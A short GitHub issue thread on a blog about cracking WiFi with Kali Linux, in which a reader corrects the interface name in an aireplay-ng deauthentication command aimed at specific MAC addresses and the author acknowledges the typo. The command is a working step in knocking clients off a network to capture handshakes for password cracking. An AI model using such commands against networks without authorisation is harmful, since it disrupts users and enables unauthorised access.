### ISSUE TITLE
kail破解WiFi

### ISSUE THREAD

**Issue by mukeyeshen** [crow821/crow821.github.io#2]
aireplay-ng -0 2 -c E8:4E:06:21:75:D7  -a 88:25:93:60:C0:D9 wlanmon   应该改为
aireplay-ng -0 2 -c E8:4E:06:21:75:D7  -a 88:25:93:60:C0:D9 wlan0mon

**Comment by crow821** [comment]
> aireplay-ng -0 2 -c E8:4E:06:21:75:D7 -a 88:25:93:60:C0:D9 wlanmon 应该改为 aireplay-ng -0 2 -c E8:4E:06: 21:75:D7 -a 88:25:93:60:C0:D9 wlan0mon

收到，这个是笔误，感谢反馈
